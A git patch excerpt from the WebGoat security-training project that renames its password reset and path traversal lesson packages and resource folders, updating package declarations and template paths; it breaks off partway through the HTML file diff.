diff --git a/src/main/java/org/owasp/webgoat/lessons/password_reset/ResetLinkAssignmentForgotPassword.java b/src/main/java/org/owasp/webgoat/lessons/passwordreset/ResetLinkAssignmentForgotPassword.java
similarity index 98%
rename from src/main/java/org/owasp/webgoat/lessons/password_reset/ResetLinkAssignmentForgotPassword.java
rename to src/main/java/org/owasp/webgoat/lessons/passwordreset/ResetLinkAssignmentForgotPassword.java
index 111753a09..c17529aea 100644
--- a/src/main/java/org/owasp/webgoat/lessons/password_reset/ResetLinkAssignmentForgotPassword.java
+++ b/src/main/java/org/owasp/webgoat/lessons/passwordreset/ResetLinkAssignmentForgotPassword.java
@@ -20,7 +20,7 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.lessons.password_reset;
+package org.owasp.webgoat.lessons.passwordreset;
 
 import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
 import org.owasp.webgoat.container.assignments.AttackResult;
diff --git a/src/main/java/org/owasp/webgoat/lessons/password_reset/SecurityQuestionAssignment.java b/src/main/java/org/owasp/webgoat/lessons/passwordreset/SecurityQuestionAssignment.java
similarity index 98%
rename from src/main/java/org/owasp/webgoat/lessons/password_reset/SecurityQuestionAssignment.java
rename to src/main/java/org/owasp/webgoat/lessons/passwordreset/SecurityQuestionAssignment.java
index fd4b2d547..83af61934 100644
--- a/src/main/java/org/owasp/webgoat/lessons/password_reset/SecurityQuestionAssignment.java
+++ b/src/main/java/org/owasp/webgoat/lessons/passwordreset/SecurityQuestionAssignment.java
@@ -20,7 +20,7 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.lessons.password_reset;
+package org.owasp.webgoat.lessons.passwordreset;
 
 import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
 import org.owasp.webgoat.container.assignments.AttackResult;
diff --git a/src/main/java/org/owasp/webgoat/lessons/password_reset/SimpleMailAssignment.java b/src/main/java/org/owasp/webgoat/lessons/passwordreset/SimpleMailAssignment.java
similarity index 98%
rename from src/main/java/org/owasp/webgoat/lessons/password_reset/SimpleMailAssignment.java
rename to src/main/java/org/owasp/webgoat/lessons/passwordreset/SimpleMailAssignment.java
index 83e56bcba..42c4dce67 100644
--- a/src/main/java/org/owasp/webgoat/lessons/password_reset/SimpleMailAssignment.java
+++ b/src/main/java/org/owasp/webgoat/lessons/passwordreset/SimpleMailAssignment.java
@@ -20,7 +20,7 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.lessons.password_reset;
+package org.owasp.webgoat.lessons.passwordreset;
 
 import org.apache.commons.lang3.StringUtils;
 import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
diff --git a/src/main/java/org/owasp/webgoat/lessons/password_reset/TriedQuestions.java b/src/main/java/org/owasp/webgoat/lessons/passwordreset/TriedQuestions.java
similarity index 96%
rename from src/main/java/org/owasp/webgoat/lessons/password_reset/TriedQuestions.java
rename to src/main/java/org/owasp/webgoat/lessons/passwordreset/TriedQuestions.java
index 69a8914dc..64d565b9f 100644
--- a/src/main/java/org/owasp/webgoat/lessons/password_reset/TriedQuestions.java
+++ b/src/main/java/org/owasp/webgoat/lessons/passwordreset/TriedQuestions.java
@@ -20,7 +20,7 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.lessons.password_reset;
+package org.owasp.webgoat.lessons.passwordreset;
 
 import org.springframework.stereotype.Component;
 import org.springframework.web.context.annotation.SessionScope;
diff --git a/src/main/java/org/owasp/webgoat/lessons/password_reset/resetlink/PasswordChangeForm.java b/src/main/java/org/owasp/webgoat/lessons/passwordreset/resetlink/PasswordChangeForm.java
similarity index 84%
rename from src/main/java/org/owasp/webgoat/lessons/password_reset/resetlink/PasswordChangeForm.java
rename to src/main/java/org/owasp/webgoat/lessons/passwordreset/resetlink/PasswordChangeForm.java
index 6ece727e3..267b39447 100644
--- a/src/main/java/org/owasp/webgoat/lessons/password_reset/resetlink/PasswordChangeForm.java
+++ b/src/main/java/org/owasp/webgoat/lessons/passwordreset/resetlink/PasswordChangeForm.java
@@ -1,4 +1,4 @@
-package org.owasp.webgoat.lessons.password_reset.resetlink;
+package org.owasp.webgoat.lessons.passwordreset.resetlink;
 
 import lombok.Getter;
 import lombok.Setter;
diff --git a/src/main/resources/lessons/password_reset/css/password.css b/src/main/resources/lessons/passwordreset/css/password.css
similarity index 100%
rename from src/main/resources/lessons/password_reset/css/password.css
rename to src/main/resources/lessons/passwordreset/css/password.css
diff --git a/src/main/resources/lessons/password_reset/documentation/PasswordReset_SecurityQuestions.adoc b/src/main/resources/lessons/passwordreset/documentation/PasswordReset_SecurityQuestions.adoc
similarity index 100%
rename from src/main/resources/lessons/password_reset/documentation/PasswordReset_SecurityQuestions.adoc
rename to src/main/resources/lessons/passwordreset/documentation/PasswordReset_SecurityQuestions.adoc
diff --git a/src/main/resources/lessons/password_reset/documentation/PasswordReset_host_header.adoc b/src/main/resources/lessons/passwordreset/documentation/PasswordReset_host_header.adoc
similarity index 100%
rename from src/main/resources/lessons/password_reset/documentation/PasswordReset_host_header.adoc
rename to src/main/resources/lessons/passwordreset/documentation/PasswordReset_host_header.adoc
diff --git a/src/main/resources/lessons/password_reset/documentation/PasswordReset_known_questions.adoc b/src/main/resources/lessons/passwordreset/documentation/PasswordReset_known_questions.adoc
similarity index 100%
rename from src/main/resources/lessons/password_reset/documentation/PasswordReset_known_questions.adoc
rename to src/main/resources/lessons/passwordreset/documentation/PasswordReset_known_questions.adoc
diff --git a/src/main/resources/lessons/password_reset/documentation/PasswordReset_mitigation.adoc b/src/main/resources/lessons/passwordreset/documentation/PasswordReset_mitigation.adoc
similarity index 100%
rename from src/main/resources/lessons/password_reset/documentation/PasswordReset_mitigation.adoc
rename to src/main/resources/lessons/passwordreset/documentation/PasswordReset_mitigation.adoc
diff --git a/src/main/resources/lessons/password_reset/documentation/PasswordReset_plan.adoc b/src/main/resources/lessons/passwordreset/documentation/PasswordReset_plan.adoc
similarity index 100%
rename from src/main/resources/lessons/password_reset/documentation/PasswordReset_plan.adoc
rename to src/main/resources/lessons/passwordreset/documentation/PasswordReset_plan.adoc
diff --git a/src/main/resources/lessons/password_reset/documentation/PasswordReset_simple.adoc b/src/main/resources/lessons/passwordreset/documentation/PasswordReset_simple.adoc
similarity index 100%
rename from src/main/resources/lessons/password_reset/documentation/PasswordReset_simple.adoc
rename to src/main/resources/lessons/passwordreset/documentation/PasswordReset_simple.adoc
diff --git a/src/main/resources/lessons/password_reset/documentation/PasswordReset_wrong_message.adoc b/src/main/resources/lessons/passwordreset/documentation/PasswordReset_wrong_message.adoc
similarity index 100%
rename from src/main/resources/lessons/password_reset/documentation/PasswordReset_wrong_message.adoc
rename to src/main/resources/lessons/passwordreset/documentation/PasswordReset_wrong_message.adoc
diff --git a/src/main/resources/lessons/password_reset/html/PasswordReset.html b/src/main/resources/lessons/passwordreset/html/PasswordReset.html
similarity index 93%
rename from src/main/resources/lessons/password_reset/html/PasswordReset.html
rename to src/main/resources/lessons/passwordreset/html/PasswordReset.html
index 4a292e009..2acb24098 100644
--- a/src/main/resources/lessons/password_reset/html/PasswordReset.html
+++ b/src/main/resources/lessons/passwordreset/html/PasswordReset.html
@@ -3,10 +3,10 @@
 <html xmlns:th="http://www.thymeleaf.org">
 
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:lessons/password_reset/documentation/PasswordReset_plan.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/passwordreset/documentation/PasswordReset_plan.adoc"></div>
 </div>
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:lessons/password_reset/documentation/PasswordReset_simple.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/passwordreset/documentation/PasswordReset_simple.adoc"></div>
 
     <link rel="stylesheet" type="text/css" th:href="@{/lesson_css/password.css}"/>
     <script th:src="@{/lesson_js/bootstrap.min.js}" language="JavaScript"></script>
@@ -90,11 +90,11 @@
 </div>
 
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:lessons/password_reset/documentation/PasswordReset_wrong_message.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/passwordreset/documentation/PasswordReset_wrong_message.adoc"></div>
 </div>
 
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:lessons/password_reset/documentation/PasswordReset_known_questions.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/passwordreset/documentation/PasswordReset_known_questions.adoc"></div>
 
     <link rel="stylesheet" type="text/css" th:href="@{/lesson_css/password.css}"/>
     <script th:src="@{/lesson_js/bootstrap.min.js}" language="JavaScript"></script>
@@ -138,7 +138,7 @@
 </div>
 
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:lessons/password_reset/documentation/PasswordReset_SecurityQuestions.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/passwordreset/documentation/PasswordReset_SecurityQuestions.adoc"></div>
     <div class="attack-container">
         <div class="assignment-success"><i class="fa fa-2 fa-check hidden" aria-hidden="true"></i></div>
         <form class="attack-form" accept-charset="UNKNOWN"
@@ -168,7 +168,7 @@
 </div>
 
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:lessons/password_reset/documentation/PasswordReset_host_header.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/passwordreset/documentation/PasswordReset_host_header.adoc"></div>
     <div class="attack-container">
         <img th:src="@{/images/wolf-enabled.png}" class="webwolf-enabled"/>
         <div class="assignment-success"><i class="fa fa-2 fa-check hidden" aria-hidden="true"></i></div>
@@ -260,6 +260,6 @@
 </div>
 
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:lessons/password_reset/documentation/PasswordReset_mitigation.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/passwordreset/documentation/PasswordReset_mitigation.adoc"></div>
 </div>
 </html>
diff --git a/src/main/resources/lessons/password_reset/i18n/WebGoatLabels.properties b/src/main/resources/lessons/passwordreset/i18n/WebGoatLabels.properties
similarity index 100%
rename from src/main/resources/lessons/password_reset/i18n/WebGoatLabels.properties
rename to src/main/resources/lessons/passwordreset/i18n/WebGoatLabels.properties
diff --git a/src/main/resources/lessons/password_reset/images/reset1.png b/src/main/resources/lessons/passwordreset/images/reset1.png
similarity index 100%
rename from src/main/resources/lessons/password_reset/images/reset1.png
rename to src/main/resources/lessons/passwordreset/images/reset1.png
diff --git a/src/main/resources/lessons/password_reset/images/reset2.png b/src/main/resources/lessons/passwordreset/images/reset2.png
similarity index 100%
rename from src/main/resources/lessons/password_reset/images/reset2.png
rename to src/main/resources/lessons/passwordreset/images/reset2.png
diff --git a/src/main/resources/lessons/password_reset/images/slack1.png b/src/main/resources/lessons/passwordreset/images/slack1.png
similarity index 100%
rename from src/main/resources/lessons/password_reset/images/slack1.png
rename to src/main/resources/lessons/passwordreset/images/slack1.png
diff --git a/src/main/resources/lessons/password_reset/images/slack2.png b/src/main/resources/lessons/passwordreset/images/slack2.png
similarity index 100%
rename from src/main/resources/lessons/password_reset/images/slack2.png
rename to src/main/resources/lessons/passwordreset/images/slack2.png
diff --git a/src/main/resources/lessons/password_reset/js/password-reset-simple.js b/src/main/resources/lessons/passwordreset/js/password-reset-simple.js
similarity index 100%
rename from src/main/resources/lessons/password_reset/js/password-reset-simple.js
rename to src/main/resources/lessons/passwordreset/js/password-reset-simple.js
diff --git a/src/main/resources/lessons/password_reset/templates/password_link_not_found.html b/src/main/resources/lessons/passwordreset/templates/password_link_not_found.html
similarity index 100%
rename from src/main/resources/lessons/password_reset/templates/password_link_not_found.html
rename to src/main/resources/lessons/passwordreset/templates/password_link_not_found.html
diff --git a/src/main/resources/lessons/password_reset/templates/password_reset.html b/src/main/resources/lessons/passwordreset/templates/password_reset.html
similarity index 100%
rename from src/main/resources/lessons/password_reset/templates/password_reset.html
rename to src/main/resources/lessons/passwordreset/templates/password_reset.html
diff --git a/src/main/resources/lessons/password_reset/templates/success.html b/src/main/resources/lessons/passwordreset/templates/success.html
similarity index 100%
rename from src/main/resources/lessons/password_reset/templates/success.html
rename to src/main/resources/lessons/passwordreset/templates/success.html
diff --git a/src/test/java/org/owasp/webgoat/lessons/password_reset/SecurityQuestionAssignmentTest.java b/src/test/java/org/owasp/webgoat/lessons/passwordreset/SecurityQuestionAssignmentTest.java
similarity index 97%
rename from src/test/java/org/owasp/webgoat/lessons/password_reset/SecurityQuestionAssignmentTest.java
rename to src/test/java/org/owasp/webgoat/lessons/passwordreset/SecurityQuestionAssignmentTest.java
index 91bc19169..072acc6d7 100644
--- a/src/test/java/org/owasp/webgoat/lessons/password_reset/SecurityQuestionAssignmentTest.java
+++ b/src/test/java/org/owasp/webgoat/lessons/passwordreset/SecurityQuestionAssignmentTest.java
@@ -1,10 +1,11 @@
-package org.owasp.webgoat.lessons.password_reset;
+package org.owasp.webgoat.lessons.passwordreset;
 
 import org.hamcrest.CoreMatchers;
 import org.junit.jupiter.api.BeforeEach;
 import org.junit.jupiter.api.Test;
 import org.junit.jupiter.api.extension.ExtendWith;
 import org.owasp.webgoat.container.plugins.LessonTest;
+import org.owasp.webgoat.lessons.passwordreset.PasswordReset;
 import org.springframework.mock.web.MockHttpSession;
 import org.springframework.test.context.junit.jupiter.SpringExtension;
 import org.springframework.test.web.servlet.MockMvc;

From 91470b93ea15a076be4622ae244927b589864790 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=C3=80ngel=20Oll=C3=A9=20Bl=C3=A1zquez?= <angel@olleb.com>
Date: Sat, 30 Jul 2022 22:23:43 +0200
Subject: [PATCH 189/227] Renamed to pathtraversal

---
 .../PathTraversal.java                          |   2 +-
 .../ProfileUpload.java                          |   2 +-
 .../ProfileUploadBase.java                      |   2 +-
 .../ProfileUploadFix.java                       |   2 +-
 .../ProfileUploadRemoveUserInput.java           |   2 +-
 .../ProfileUploadRetrieval.java                 |   4 ++--
 .../ProfileZipSlip.java                         |   2 +-
 .../css/path_traversal.css                      |   0
 .../documentation/PathTraversal_intro.adoc      |   0
 .../documentation/PathTraversal_retrieval.adoc  |   0
 .../documentation/PathTraversal_upload.adoc     |   0
 .../documentation/PathTraversal_upload_fix.adoc |   0
 .../PathTraversal_upload_fixed.adoc             |   0
 .../PathTraversal_upload_mitigation.adoc        |   0
 .../PathTraversal_upload_remove_user_input.adoc |   0
 .../documentation/PathTraversal_zip_slip.adoc   |   0
 .../PathTraversal_zip_slip_assignment.adoc      |   0
 .../PathTraversal_zip_slip_solution.adoc        |   0
 .../html/PathTraversal.html                     |  16 ++++++++--------
 .../i18n/WebGoatLabels.properties               |   0
 .../images/account.png                          | Bin
 .../images/cats/1.jpg                           | Bin
 .../images/cats/10.jpg                          | Bin
 .../images/cats/2.jpg                           | Bin
 .../images/cats/3.jpg                           | Bin
 .../images/cats/4.jpg                           | Bin
 .../images/cats/5.jpg                           | Bin
 .../images/cats/6.jpg                           | Bin
 .../images/cats/7.jpg                           | Bin
 .../images/cats/8.jpg                           | Bin
 .../images/cats/9.jpg                           | Bin
 .../js/path_traversal.js                        |   0
 .../ProfileUploadFixTest.java                   |   4 ++--
 .../ProfileUploadRemoveUserInputTest.java       |   4 ++--
 .../ProfileUploadRetrievalTest.java             |   4 ++--
 .../ProfileUploadTest.java                      |   4 ++--
 36 files changed, 24 insertions(+), 24 deletions(-)
 rename src/main/java/org/owasp/webgoat/lessons/{path_traversal => pathtraversal}/PathTraversal.java (96%)
 rename src/main/java/org/owasp/webgoat/lessons/{path_traversal => pathtraversal}/ProfileUpload.java (97%)
 rename src/main/java/org/owasp/webgoat/lessons/{path_traversal => pathtraversal}/ProfileUploadBase.java (98%)
 rename src/main/java/org/owasp/webgoat/lessons/{path_traversal => pathtraversal}/ProfileUploadFix.java (97%)
 rename src/main/java/org/owasp/webgoat/lessons/{path_traversal => pathtraversal}/ProfileUploadRemoveUserInput.java (96%)
 rename src/main/java/org/owasp/webgoat/lessons/{path_traversal => pathtraversal}/ProfileUploadRetrieval.java (97%)
 rename src/main/java/org/owasp/webgoat/lessons/{path_traversal => pathtraversal}/ProfileZipSlip.java (98%)
 rename src/main/resources/lessons/{path_traversal => pathtraversal}/css/path_traversal.css (100%)
 rename src/main/resources/lessons/{path_traversal => pathtraversal}/documentation/PathTraversal_intro.adoc (100%)
 rename src/main/resources/lessons/{path_traversal => pathtraversal}/documentation/PathTraversal_retrieval.adoc (100%)
 rename src/main/resources/lessons/{path_traversal => pathtraversal}/documentation/PathTraversal_upload.adoc (100%)
 rename src/main/resources/lessons/{path_traversal => pathtraversal}/documentation/PathTraversal_upload_fix.adoc (100%)
 rename src/main/resources/lessons/{path_traversal => pathtraversal}/documentation/PathTraversal_upload_fixed.adoc (100%)
 rename src/main/resources/lessons/{path_traversal => pathtraversal}/documentation/PathTraversal_upload_mitigation.adoc (100%)
 rename src/main/resources/lessons/{path_traversal => pathtraversal}/documentation/PathTraversal_upload_remove_user_input.adoc (100%)
 rename src/main/resources/lessons/{path_traversal => pathtraversal}/documentation/PathTraversal_zip_slip.adoc (100%)
 rename src/main/resources/lessons/{path_traversal => pathtraversal}/documentation/PathTraversal_zip_slip_assignment.adoc (100%)
 rename src/main/resources/lessons/{path_traversal => pathtraversal}/documentation/PathTraversal_zip_slip_solution.adoc (100%)
 rename src/main/resources/lessons/{path_traversal => pathtraversal}/html/PathTraversal.html (92%)
 rename src/main/resources/lessons/{path_traversal => pathtraversal}/i18n/WebGoatLabels.properties (100%)
 rename src/main/resources/lessons/{path_traversal => pathtraversal}/images/account.png (100%)
 rename src/main/resources/lessons/{path_traversal => pathtraversal}/images/cats/1.jpg (100%)
 rename src/main/resources/lessons/{path_traversal => pathtraversal}/images/cats/10.jpg (100%)
 rename src/main/resources/lessons/{path_traversal => pathtraversal}/images/cats/2.jpg (100%)
 rename src/main/resources/lessons/{path_traversal => pathtraversal}/images/cats/3.jpg (100%)
 rename src/main/resources/lessons/{path_traversal => pathtraversal}/images/cats/4.jpg (100%)
 rename src/main/resources/lessons/{path_traversal => pathtraversal}/images/cats/5.jpg (100%)
 rename src/main/resources/lessons/{path_traversal => pathtraversal}/images/cats/6.jpg (100%)
 rename src/main/resources/lessons/{path_traversal => pathtraversal}/images/cats/7.jpg (100%)
 rename src/main/resources/lessons/{path_traversal => pathtraversal}/images/cats/8.jpg (100%)
 rename src/main/resources/lessons/{path_traversal => pathtraversal}/images/cats/9.jpg (100%)
 rename src/main/resources/lessons/{path_traversal => pathtraversal}/js/path_traversal.js (100%)
 rename src/test/java/org/owasp/webgoat/lessons/{path_traversal => pathtraversal}/ProfileUploadFixTest.java (95%)
 rename src/test/java/org/owasp/webgoat/lessons/{path_traversal => pathtraversal}/ProfileUploadRemoveUserInputTest.java (95%)
 rename src/test/java/org/owasp/webgoat/lessons/{path_traversal => pathtraversal}/ProfileUploadRetrievalTest.java (97%)
 rename src/test/java/org/owasp/webgoat/lessons/{path_traversal => pathtraversal}/ProfileUploadTest.java (97%)

diff --git a/src/main/java/org/owasp/webgoat/lessons/path_traversal/PathTraversal.java b/src/main/java/org/owasp/webgoat/lessons/pathtraversal/PathTraversal.java
similarity index 96%
rename from src/main/java/org/owasp/webgoat/lessons/path_traversal/PathTraversal.java
rename to src/main/java/org/owasp/webgoat/lessons/pathtraversal/PathTraversal.java
index 703aa30ea..da689cf42 100644
--- a/src/main/java/org/owasp/webgoat/lessons/path_traversal/PathTraversal.java
+++ b/src/main/java/org/owasp/webgoat/lessons/pathtraversal/PathTraversal.java
@@ -20,7 +20,7 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.lessons.path_traversal;
+package org.owasp.webgoat.lessons.pathtraversal;
 
 import org.owasp.webgoat.container.lessons.Category;
 import org.owasp.webgoat.container.lessons.Lesson;
diff --git a/src/main/java/org/owasp/webgoat/lessons/path_traversal/ProfileUpload.java b/src/main/java/org/owasp/webgoat/lessons/pathtraversal/ProfileUpload.java
similarity index 97%
rename from src/main/java/org/owasp/webgoat/lessons/path_traversal/ProfileUpload.java
rename to src/main/java/org/owasp/webgoat/lessons/pathtraversal/ProfileUpload.java
index eaaff7963..754933530 100644
--- a/src/main/java/org/owasp/webgoat/lessons/path_traversal/ProfileUpload.java
+++ b/src/main/java/org/owasp/webgoat/lessons/pathtraversal/ProfileUpload.java
@@ -1,4 +1,4 @@
-package org.owasp.webgoat.lessons.path_traversal;
+package org.owasp.webgoat.lessons.pathtraversal;
 
 import org.owasp.webgoat.container.assignments.AssignmentHints;
 import org.owasp.webgoat.container.assignments.AttackResult;
diff --git a/src/main/java/org/owasp/webgoat/lessons/path_traversal/ProfileUploadBase.java b/src/main/java/org/owasp/webgoat/lessons/pathtraversal/ProfileUploadBase.java
similarity index 98%
rename from src/main/java/org/owasp/webgoat/lessons/path_traversal/ProfileUploadBase.java
rename to src/main/java/org/owasp/webgoat/lessons/pathtraversal/ProfileUploadBase.java
index 639e9eca7..4377650a1 100644
--- a/src/main/java/org/owasp/webgoat/lessons/path_traversal/ProfileUploadBase.java
+++ b/src/main/java/org/owasp/webgoat/lessons/pathtraversal/ProfileUploadBase.java
@@ -1,4 +1,4 @@
-package org.owasp.webgoat.lessons.path_traversal;
+package org.owasp.webgoat.lessons.pathtraversal;
 
 import lombok.AllArgsConstructor;
 import lombok.Getter;
diff --git a/src/main/java/org/owasp/webgoat/lessons/path_traversal/ProfileUploadFix.java b/src/main/java/org/owasp/webgoat/lessons/pathtraversal/ProfileUploadFix.java
similarity index 97%
rename from src/main/java/org/owasp/webgoat/lessons/path_traversal/ProfileUploadFix.java
rename to src/main/java/org/owasp/webgoat/lessons/pathtraversal/ProfileUploadFix.java
index da7214377..c1dd5ce58 100644
--- a/src/main/java/org/owasp/webgoat/lessons/path_traversal/ProfileUploadFix.java
+++ b/src/main/java/org/owasp/webgoat/lessons/pathtraversal/ProfileUploadFix.java
@@ -1,4 +1,4 @@
-package org.owasp.webgoat.lessons.path_traversal;
+package org.owasp.webgoat.lessons.pathtraversal;
 
 import org.owasp.webgoat.container.assignments.AssignmentHints;
 import org.owasp.webgoat.container.assignments.AttackResult;
diff --git a/src/main/java/org/owasp/webgoat/lessons/path_traversal/ProfileUploadRemoveUserInput.java b/src/main/java/org/owasp/webgoat/lessons/pathtraversal/ProfileUploadRemoveUserInput.java
similarity index 96%
rename from src/main/java/org/owasp/webgoat/lessons/path_traversal/ProfileUploadRemoveUserInput.java
rename to src/main/java/org/owasp/webgoat/lessons/pathtraversal/ProfileUploadRemoveUserInput.java
index ecfcc46fe..d62c8451d 100644
--- a/src/main/java/org/owasp/webgoat/lessons/path_traversal/ProfileUploadRemoveUserInput.java
+++ b/src/main/java/org/owasp/webgoat/lessons/pathtraversal/ProfileUploadRemoveUserInput.java
@@ -1,4 +1,4 @@
-package org.owasp.webgoat.lessons.path_traversal;
+package org.owasp.webgoat.lessons.pathtraversal;
 
 import org.owasp.webgoat.container.assignments.AssignmentHints;
 import org.owasp.webgoat.container.assignments.AttackResult;
diff --git a/src/main/java/org/owasp/webgoat/lessons/path_traversal/ProfileUploadRetrieval.java b/src/main/java/org/owasp/webgoat/lessons/pathtraversal/ProfileUploadRetrieval.java
similarity index 97%
rename from src/main/java/org/owasp/webgoat/lessons/path_traversal/ProfileUploadRetrieval.java
rename to src/main/java/org/owasp/webgoat/lessons/pathtraversal/ProfileUploadRetrieval.java
index 247b07425..b010532eb 100644
--- a/src/main/java/org/owasp/webgoat/lessons/path_traversal/ProfileUploadRetrieval.java
+++ b/src/main/java/org/owasp/webgoat/lessons/pathtraversal/ProfileUploadRetrieval.java
@@ -1,4 +1,4 @@
-package org.owasp.webgoat.lessons.path_traversal;
+package org.owasp.webgoat.lessons.pathtraversal;
 
 import lombok.extern.slf4j.Slf4j;
 import org.apache.commons.lang3.RandomUtils;
@@ -51,7 +51,7 @@ public class ProfileUploadRetrieval extends AssignmentEndpoint {
     @PostConstruct
     public void initAssignment() {
         for (int i = 1; i <= 10; i++) {
-            try (InputStream is = new ClassPathResource("lessons/path_traversal/images/cats/" + i + ".jpg").getInputStream()) {
+            try (InputStream is = new ClassPathResource("lessons/pathtraversal/images/cats/" + i + ".jpg").getInputStream()) {
                 FileCopyUtils.copy(is, new FileOutputStream(new File(catPicturesDirectory, i + ".jpg")));
             } catch (Exception e) {
                 log.error("Unable to copy pictures" + e.getMessage());
diff --git a/src/main/java/org/owasp/webgoat/lessons/path_traversal/ProfileZipSlip.java b/src/main/java/org/owasp/webgoat/lessons/pathtraversal/ProfileZipSlip.java
similarity index 98%
rename from src/main/java/org/owasp/webgoat/lessons/path_traversal/ProfileZipSlip.java
rename to src/main/java/org/owasp/webgoat/lessons/pathtraversal/ProfileZipSlip.java
index e1ea60fe8..7bcf317d9 100644
--- a/src/main/java/org/owasp/webgoat/lessons/path_traversal/ProfileZipSlip.java
+++ b/src/main/java/org/owasp/webgoat/lessons/pathtraversal/ProfileZipSlip.java
@@ -1,4 +1,4 @@
-package org.owasp.webgoat.lessons.path_traversal;
+package org.owasp.webgoat.lessons.pathtraversal;
 
 import lombok.SneakyThrows;
 import org.owasp.webgoat.container.assignments.AssignmentHints;
diff --git a/src/main/resources/lessons/path_traversal/css/path_traversal.css b/src/main/resources/lessons/pathtraversal/css/path_traversal.css
similarity index 100%
rename from src/main/resources/lessons/path_traversal/css/path_traversal.css
rename to src/main/resources/lessons/pathtraversal/css/path_traversal.css
diff --git a/src/main/resources/lessons/path_traversal/documentation/PathTraversal_intro.adoc b/src/main/resources/lessons/pathtraversal/documentation/PathTraversal_intro.adoc
similarity index 100%
rename from src/main/resources/lessons/path_traversal/documentation/PathTraversal_intro.adoc
rename to src/main/resources/lessons/pathtraversal/documentation/PathTraversal_intro.adoc
diff --git a/src/main/resources/lessons/path_traversal/documentation/PathTraversal_retrieval.adoc b/src/main/resources/lessons/pathtraversal/documentation/PathTraversal_retrieval.adoc
similarity index 100%
rename from src/main/resources/lessons/path_traversal/documentation/PathTraversal_retrieval.adoc
rename to src/main/resources/lessons/pathtraversal/documentation/PathTraversal_retrieval.adoc
diff --git a/src/main/resources/lessons/path_traversal/documentation/PathTraversal_upload.adoc b/src/main/resources/lessons/pathtraversal/documentation/PathTraversal_upload.adoc
similarity index 100%
rename from src/main/resources/lessons/path_traversal/documentation/PathTraversal_upload.adoc
rename to src/main/resources/lessons/pathtraversal/documentation/PathTraversal_upload.adoc
diff --git a/src/main/resources/lessons/path_traversal/documentation/PathTraversal_upload_fix.adoc b/src/main/resources/lessons/pathtraversal/documentation/PathTraversal_upload_fix.adoc
similarity index 100%
rename from src/main/resources/lessons/path_traversal/documentation/PathTraversal_upload_fix.adoc
rename to src/main/resources/lessons/pathtraversal/documentation/PathTraversal_upload_fix.adoc
diff --git a/src/main/resources/lessons/path_traversal/documentation/PathTraversal_upload_fixed.adoc b/src/main/resources/lessons/pathtraversal/documentation/PathTraversal_upload_fixed.adoc
similarity index 100%
rename from src/main/resources/lessons/path_traversal/documentation/PathTraversal_upload_fixed.adoc
rename to src/main/resources/lessons/pathtraversal/documentation/PathTraversal_upload_fixed.adoc
diff --git a/src/main/resources/lessons/path_traversal/documentation/PathTraversal_upload_mitigation.adoc b/src/main/resources/lessons/pathtraversal/documentation/PathTraversal_upload_mitigation.adoc
similarity index 100%
rename from src/main/resources/lessons/path_traversal/documentation/PathTraversal_upload_mitigation.adoc
rename to src/main/resources/lessons/pathtraversal/documentation/PathTraversal_upload_mitigation.adoc
diff --git a/src/main/resources/lessons/path_traversal/documentation/PathTraversal_upload_remove_user_input.adoc b/src/main/resources/lessons/pathtraversal/documentation/PathTraversal_upload_remove_user_input.adoc
similarity index 100%
rename from src/main/resources/lessons/path_traversal/documentation/PathTraversal_upload_remove_user_input.adoc
rename to src/main/resources/lessons/pathtraversal/documentation/PathTraversal_upload_remove_user_input.adoc
diff --git a/src/main/resources/lessons/path_traversal/documentation/PathTraversal_zip_slip.adoc b/src/main/resources/lessons/pathtraversal/documentation/PathTraversal_zip_slip.adoc
similarity index 100%
rename from src/main/resources/lessons/path_traversal/documentation/PathTraversal_zip_slip.adoc
rename to src/main/resources/lessons/pathtraversal/documentation/PathTraversal_zip_slip.adoc
diff --git a/src/main/resources/lessons/path_traversal/documentation/PathTraversal_zip_slip_assignment.adoc b/src/main/resources/lessons/pathtraversal/documentation/PathTraversal_zip_slip_assignment.adoc
similarity index 100%
rename from src/main/resources/lessons/path_traversal/documentation/PathTraversal_zip_slip_assignment.adoc
rename to src/main/resources/lessons/pathtraversal/documentation/PathTraversal_zip_slip_assignment.adoc
diff --git a/src/main/resources/lessons/path_traversal/documentation/PathTraversal_zip_slip_solution.adoc b/src/main/resources/lessons/pathtraversal/documentation/PathTraversal_zip_slip_solution.adoc
similarity index 100%
rename from src/main/resources/lessons/path_traversal/documentation/PathTraversal_zip_slip_solution.adoc
rename to src/main/resources/lessons/pathtraversal/documentation/PathTraversal_zip_slip_solution.adoc
diff --git a/src/main/resources/lessons/path_traversal/html/PathTraversal.html b/src/main/resources/lessons/pathtraversal/html/PathTraversal.html
similarity index 92%
rename from src/main/resources/lessons/path_traversal/html/PathTraversal.html
rename to src/main/resources/lessons/pathtraversal/html/PathTraversal.html
index d56f8e8f9..fd19a7495 100644
--- a/src/main/resources/lessons/path_traversal/html/PathTraversal.html
+++ b/src/main/resources/lessons/pathtraversal/html/PathTraversal.html
@@ -5,11 +5,11 @@
 
 
 <div class="lesson-page-wrapper">
